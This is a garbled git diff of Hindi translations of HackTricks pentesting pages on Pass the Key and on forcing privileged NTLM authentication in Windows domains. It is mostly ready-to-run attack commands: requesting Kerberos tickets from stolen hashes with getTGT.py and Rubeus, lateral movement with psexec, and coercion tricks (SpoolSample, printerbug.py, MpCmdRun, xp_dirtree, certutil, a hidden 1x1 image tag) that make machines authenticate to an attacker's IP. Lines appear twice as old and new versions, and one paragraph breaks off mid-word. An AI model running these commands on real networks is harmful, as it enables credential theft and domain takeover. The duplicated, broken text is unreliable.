यह हमला **उपयोगकर्ता NTLM हैश या AES कुंजियों का उपयोग करके Kerberos टिकटें अनुरोध करने** का उद्देश्य रखता है, सामान्य Pass The Hash over NTLM प्रोटोकॉल के बजाय। इसलिए, यह **विशेष रूप से उपयोगी हो सकता है उन नेटवर्कों में जहां NTLM प्रोटोकॉल अक्षम है** और केवल **Kerberos को प्रमाणीकरण प्रोटोकॉल के रूप में स्वीकृत किया गया है**
इस हमले को कार्यान्वित करने के लिए, **लक्षित उपयोगकर्ता खाते का NTLM हैश (या पासवर्ड) आवश्यक है**। इसलिए, एक उपयोगकर्ता हैश प्राप्त होने के बाद, उस खाते के लिए एक TGT अनुरोध किया जा सकता है। अंततः, यह संभव है कि **किसी भी सेवा या मशीन तक पहुंचा जा सके** जहां उपयोगकर्ता खाते की अनुमति है।
```
python getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass
```
आप **विशिष्ट** करने के लिए `-aesKey [AES कुंजी]` निर्दिष्ट कर सकते हैं कि **AES256** का उपयोग करें।\
आप टिकट का उपयोग अन्य उपकरणों के साथ भी कर सकते हैं, जैसे: smbexec.py या wmiexec.py
आप **निर्दिषित** कर सकते हैं `-aesKey [AES कुंजी]` उपयोग करने के लिए **AES256** को निर्दिषित करने के लिए।\
आप टिकट का उपयोग अन्य उपकरणों के साथ भी कर सकते हैं: जैसे smbexec.py या wmiexec.py
संभावित समस्याएं:
* _PyAsn1Error('NamedTypes can cast only scalar values',)_ : नवीनतम संस्करण में impacket को अपडेट करके हल हो जाती है।
* _KDC नाम नहीं मिला_ : Kerberos KDC द्वारा मान्यता प्राप्त नहीं होने के कारण, IP पते के बजाय होस्टनाम का उपयोग करके हल हो जाती है।
* _PyAsn1Error(NamedTypes can cast only scalar values,)_ : अपडेट करके impacket को नवीनतम संस्करण में सुलझाया गया
* _KDC cant found the name_ : होस्टनाम का उपयोग करके सुलझाया गया, क्योंकि यह केरबेरोस KDC द्वारा मान्यता प्राप्त नहीं किया गया था
```
.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd
```
यह प्रकार का हमला **पास द की** के समान है, लेकिन हैश का उपयोग करके टिकट का अनुरोध करने की बजाय, टिकट स्वयं चोरी किया जाता है और इसका उपयोग अपने मालिक के रूप में प्रमाणित करने के लिए किया जाता है।
यह प्रकार का हमला **पास द की** के लिए समान है, लेकिन हैश का उपयोग करने की बजाय टिकट को चुराया जाता है और इसका उपयोग अपने मालिक के रूप में प्रमाणित करने के लिए किया जाता है।
{% hint style="warning" %}
जब एक TGT का अनुरोध किया जाता है, तो घटना `4768: एक केरबेरोस प्रमाणीकरण टिकट (TGT) का अनुरोध किया गया था` उत्पन्न होती है। आप ऊपर के आउटपुट से देख सकते हैं कि KeyType **RC4-HMAC** (0x17) है, लेकिन Windows के लिए डिफ़ॉल्ट प्रकार अब **AES256** (0x12) है।
जब एक टीजीटी का अनुरोध किया जाता है, तो घटना `4768: एक केरबेरोस प्रमाणीकरण टिकट (टीजीटी) का अनुरोध किया गया था` उत्पन्न होती है। आप ऊपर के आउटपुट से देख सकते हैं कि KeyType **RC4-HMAC** (0x17) है, लेकिन Windows के लिए डिफ़ॉल्ट प्रकार अब **AES256** (0x12) है।
{% endhint %}
```bash
.\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:HASH /nowrap /opsec
@ -35,10 +49,10 @@ python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) का पता लगाए
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जांच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करे
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके।
</details>

View file

@ -1,73 +1,67 @@
# Force NTLM Privileged Authentication
# एनटीएलएम विशेषाधिकारिक प्रमाणीकरण को बलपूर्वक करें
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके**.
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करने का एक्सेस** प्राप्त करना चाहते हैं? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीज़**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मेरा** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।
* **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud)** में पीआर जमा करके।
</details>
## SharpSystemTriggers
[**SharpSystemTriggers**](https://github.com/cube0x0/SharpSystemTriggers) C# में कोडित **रिमोट ऑथेंटिकेशन ट्रिगर्स** का एक **संग्रह** है, जिसे MIDL कंपाइलर का उपयोग करके तीसरे पक्ष की निर्भरताओं से बचने के लिए बनाया गया है।
[**SharpSystemTriggers**](https://github.com/cube0x0/SharpSystemTriggers) एक **संग्रह** है जिसमें C# का उपयोग करके MIDL कंपाइलर का उपयोग करके **दूसरों की आवश्यकता नहीं होने पर दूरस्थ प्रमाणीकरण ट्रिगर** कोड किया गया है।
## Spooler Service Abuse
## स्पूलर सेवा दुरुपयोग
यदि _**Print Spooler**_ सेवा **सक्षम** है, तो आप कुछ पहले से ज्ञात AD क्रेडेंशियल्स का उपयोग करके डोमेन कंट्रोलर के प्रिंट सर्वर से नए प्रिंट जॉब्स पर एक **अपडेट** का **अनुरोध** कर सकते हैं और बस उसे किसी सिस्टम को नोटिफिकेशन भेजने के लिए कह सकते हैं।\
नोट जब प्रिंटर किसी मनमाने सिस्टम को नोटिफिकेशन भेजता है, तो उसे उस **सिस्टम** के खिलाफ **प्रमाणित करना** पड़ता है। इसलिए, एक हमलावर _**Print Spooler**_ सेवा को किसी मनमाने सिस्टम के खिलाफ प्रमाणित करने के लिए बना सकता है, और सेवा इस प्रमाणीकरण में **कंप्यूटर अकाउंट** का उपयोग करेगी।
यदि _**प्रिंट स्पूलर**_ सेवा **सक्रिय** है, तो आप कुछ पहले से जाने जाने वाले एडी क्रेडेंशियल का उपयोग करके डोमेन कंट्रोलर के प्रिंट सर्वर से नए प्रिंट जॉब्स पर **अपडेट** करने के लिए अनुरोध कर सकते हैं और बस इसे किसी सिस्टम पर **सूचना भेजने** के लिए कह सकते हैं।\
ध्यान दें कि प्रिंटर जब किसी अनिश्चित सिस्टम को सूचना भेजते हैं, तो उसे उस सिस्टम के खिलाफ **प्रमाणीकरण करने की आवश्यकता** होती है। इसलिए, एक हमलावर _**प्रिंट स्पूलर**_ सेवा को किसी अनिश्चित सिस्टम के खिलाफ प्रमाणीकरण करने के लिए बना सकता है, और सेवा **इस प्रमाणीकरण में कंप्यूटर खाता** का उपयोग करेगी।
### डोमेन पर Windows सर्वर्स का पता लगाना
### डोमेन पर विंडोज सर्वर्स खोजना
PowerShell का उपयोग करके, Windows बॉक्सेस की एक सूची प्राप्त करें। सर्वर्स आमतौर पर प्राथमिकता होते हैं, इसलिए वहाँ पर ध्यान केंद्रित करें:
PowerShell का उपयोग करके, विंडोज बॉक्स की सूची प्राप्त करें। सर्वर आम तौर पर प्राथमिकता होते हैं, इसलिए हमें वहाँ ध्यान केंद्रित करना चाहिए:
```bash
Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt
```
### स्पूलर सेवाएँ सुनना पाना
### स्पूलर सेवाएं सुन रही हैं
थोड़ा संशोधित @mysmartlogin's (Vincent Le Toux's) [SpoolerScanner](https://github.com/NotMedic/NetNTLMtoSilverTicket) का उपयोग करके, देखें कि स्पूलर सेवा सुन रही है या नहीं:
थोड़ी बदली हुई @mysmartlogin's (विन्सेंट ले टूक्स) [SpoolerScanner](https://github.com/NotMedic/NetNTLMtoSilverTicket) का उपयोग करके देखें कि क्या स्पूलर सेवा सुन रही है:
```bash
. .\Get-SpoolStatus.ps1
ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}
```
आप Linux पर rpcdump.py का भी उपयोग कर सकते हैं और MS-RPRN प्रोटोकॉल की खोज कर सकते हैं।
आप लिनक्स पर rpcdump.py का उपयोग कर सकते हैं और MS-RPRN Protocol के लिए खोज कर सकते हैं।
```bash
rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN
```
### सेवा से किसी मनमाने होस्ट के खिलाफ प्रमाणित करने के लिए कहें
### एक सेवा से किसी भी होस्ट के खिलाफ प्रमाणीकरण करने के लिए सेवा से पूछें
आप [**SpoolSample यहाँ से कंपाइल कर सकते हैं**](https://github.com/NotMedic/NetNTLMtoSilverTicket)**।**
आप यहाँ से [**SpoolSample को कंपाइल कर सकते हैं**](https://github.com/NotMedic/NetNTLMtoSilverTicket)**।**
```bash
SpoolSample.exe <TARGET> <RESPONDERIP>
```
या उपयोग करें [**3xocyte's dementor.py**](https://github.com/NotMedic/NetNTLMtoSilverTicket) या [**printerbug.py**](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) अगर आप Linux पर हैं
या [**3xocyte का dementor.py**](https://github.com/NotMedic/NetNTLMtoSilverTicket) या [**printerbug.py**](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) का उपयोग करें अगर आप Linux पर हैं
```bash
python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>
```
### अनियंत्रित प्रतिनिधिमंडल के साथ संयोजन
### अनियंत्रित अनुमंडन के साथ संयोजन
यदि हमलावर ने पहले से ही [अनियंत्रित प्रतिनिधिमंडल](unconstrained-delegation.md) वाले कंप्यूटर को समझौता किया है, तो हमलावर **प्रिंटर को इस कंप्यूटर के खिलाफ प्रमाणित करने के लिए मजबूर कर सकता है**। अनियंत्रित प्रतिनिधिमंडल के कारण, **प्रिंटर के कंप्यूटर खाते का TGT** **मेमोरी में संग्रहित किया जाएगा** जिस कंप्यूटर में अनियंत्रित प्रतिनिधिमंडल है। चूंकि हमलावर ने पहले ही इस होस्ट को समझौता किया है, वह **इस टिकट को पुनः प्राप्त करने** और इसका दुरुपयोग करने में सक्षम होगा ([Pass the Ticket](pass-the-ticket.md))।
यदि किसी हमलावर ने पहले से ही [अनियंत्रित अनुमंडन](unconstrained-delegation.md) के साथ किसी कंप्यूटर को कंप्रमाइज कर लिया है, तो हमलावर **प्रिंटर को इस कंप्यूटर के खिलाफ प्रमाणीकरण करने** के लिए उपयोग कर सकता है। अनियंत्रित अनुमंडन के कारण, **प्रिंटर के कंप्यूटर खाते का TGT** अनियंत्रित अनुमंडन वाले कंप्यूटर की मेमोरी में **सहेजा जाएगा**। क्योंकि हमलावर ने पहले से ही इस होस्ट को कंप्रमाइज कर लिया है, वह **इस टिकट को पुनः प्राप्त** कर सकेगा और इसका दुरुपयोग कर सकेगा ([टिकट पास करें](pass-the-ticket.md))।
## RCP जबरन प्रमाणीकरण
## RCP बल प्रमाणीकरण
{% embed url="https://github.com/p0dalirius/Coercer" %}
## PrivExchange
`PrivExchange` हमला **Exchange Server `PushSubscription` सुविधा** में पाए गए एक दोष का परिणाम है। इस सुविधा के अनुसार, Exchange सर्वर को किसी भी डोमेन उपयोगकर्ता द्वारा जिसके पास मेलबॉक्स है, HTTP के माध्यम से किसी भी क्लाइंट-प्रदान किए गए होस्ट के लिए प्रमाणित करने के लिए मजबूर किया जा सकता है
`PrivExchange` हमला एक दोष का परिणाम है जो पाया गया है **एक्सचेंज सर्वर `PushSubscription` सुविधा** में। यह सुविधा एक्सचेंज सर्वर को किसी भी डोमेन उपयोगकर्ता के द्वारा बाधित करने की अनुमति देती है ताकि वह HTTP के माध्यम से किसी भी क्लाइंट द्वारा प्रदान किए गए होस्ट को प्रमाणीकृत कर सके
डिफ़ॉल्ट रूप से, **Exchange सेवा SYSTEM के रूप में चलती है** और इसे अत्यधिक विशेषाधिकार दिए जाते हैं (विशेष रूप से, इसके पास **2019 संचयी अपडेट से पहले डोमेन पर WriteDacl विशेषाधिकार होते हैं**)। इस दोष का शोषण करके **LDAP के लिए जानकारी को रिले करने और बाद में डोमेन NTDS डेटाबेस को निकालने** को सक्षम किया जा सकता है। जहां LDAP के लिए रिले करना संभव नहीं है, वहां यह दोष अभी भी डोमेन के भीतर अन्य होस्टों के लिए रिले और प्रमाणित करने के लिए उपयोग किया जा सकता है। इस हमले के सफल शोषण से किसी भी प्रमाणित डोमेन उपयोगकर्ता खाते के साथ तुरंत Domain Admin तक पहुंच प्राप्त होती है।
## Windows के अंदर
यदि आप पहले से ही Windows मशीन के अंदर हैं तो आप निम्नलिखित का उपयोग करके Windows को विशेषाधिकार प्राप्त खातों के साथ सर्वर से जोड़ने के लिए मजबूर कर सकते हैं:
### Defender MpCmdRun
डिफ़ॉल्ट रूप से, **एक्सचेंज सेवा SYSTEM के रूप में चलती है** और इसे अत्यधिक अधिकार (विशेष रूप से, यह **डोमेन पूर्व-2019 संचयी अपड
```bash
C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\<YOUR IP>\file.txt
```
@ -75,41 +69,29 @@ C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -S
```sql
EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1
```
या इस अन्य तकनीक का उपयोग करें: [https://github.com/p0dalirius/MSSQL-Analysis-Coerce](https://github.com/p0dalirius/MSSQL-Analysis-Coerce)
या इस दूसरी तकनीक का उपयोग करें: [https://github.com/p0dalirius/MSSQL-Analysis-Coerce](https://github.com/p0dalirius/MSSQL-Analysis-Coerce)
### Certutil
certutil.exe lolbin (Microsoft-हस्ताक्षरित बाइनरी) का उपयोग करके NTLM प्रमाणीकरण को मजबूर करना संभव है:
Certutil.exe lolbin (Microsoft-signed binary) का उपयोग करके NTLM प्रमाणीकरण को बलपूर्वक करना संभव है:
```bash
certutil.exe -syncwithWU \\127.0.0.1\share
```
## HTML इजेक्शन
## HTML इन्जेक्शन
### ईमेल के माध्यम से
यदि आप उस उपयोगकर्ता का **ईमेल पता** जानते हैं जो आपके द्वारा समझौता करने के लिए मशीन में लॉग इन करता है, तो आप उसे **1x1 इमेज के साथ एक ईमेल** भेज सकते हैं जैसे
यदि आपके पास उस उपयोगकर्ता का **ईमेल पता** है जो आपके द्वारा कंप्रमाइज़ करना चाहते हैं, तो आप उसे एक **1x1 छवि** के साथ एक ईमेल भेज सकते हैं जैसे कि
```html
<img src="\\10.10.17.231\test.ico" height="1" width="1" />
```
### MitM
यदि आप किसी कंप्यूटर पर MitM हमला कर सकते हैं और उस पेज में HTML इंजेक्ट कर सकते हैं जिसे वह देख रहा हो, तो आप उस पेज में निम्नलिखित जैसी इमेज इंजेक्ट करने का प्रयास कर सकते हैं:
यदि आप किसी कंप्यूटर पर MitM हमला कर सकते हैं और उस पेज में HTML इंजेक्ट कर सकते हैं जिसे वह देखेगा, तो आप पेज में निम्नलिखित तरह की छवि इंजेक्ट करने की कोशिश कर सकते हैं:
```html
<img src="\\10.10.17.231\test.ico" height="1" width="1" />
```
## NTLMv1 क्रैक करना
## NTLMv1 क्रैकिंग
यदि आप [NTLMv1 चैलेंजेस कैप्चर कर सकते हैं, तो यहां पढ़ें कि उन्हें कैसे क्रैक करें](../ntlm/#ntlmv1-attack).\
_याद रखें कि NTLMv1 क्रैक करने के लिए आपको Responder चैलेंज को "1122334455667788" पर सेट करना होगा_
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबरसिक्योरिटी कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुंच चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके**.
</details>
यदि आप [NTLMv1 चैलेंज कैप्चर कर सकते हैं तो यहाँ पढ़ें कैसे उन्हें क्रैक करें](../ntlm/#ntlmv1-attack)।\
_ध्यान रखें कि NTLMv1 को क्रैक करने के लिए आपको रिस्पॉंडर चैलेंज को "1122334455667788" पर सेट करना होगा_

View file

@ -4,10 +4,10 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपन**कंपनी को हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड** करना चाहते हैं? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपक**कंपनी को हैकट्रिक्स में विज्ञापित किया जाए**? या क्या आपको **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करने का एक्सेस चाहिए**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details>
@ -18,10 +18,10 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपन**कंपनी को हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड** करना चाहते हैं? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपक**कंपनी को हैकट्रिक्स में विज्ञापित किया जाए**? या क्या आपको **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करने का एक्सेस चाहिए**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details>

View file

@ -4,25 +4,25 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।**
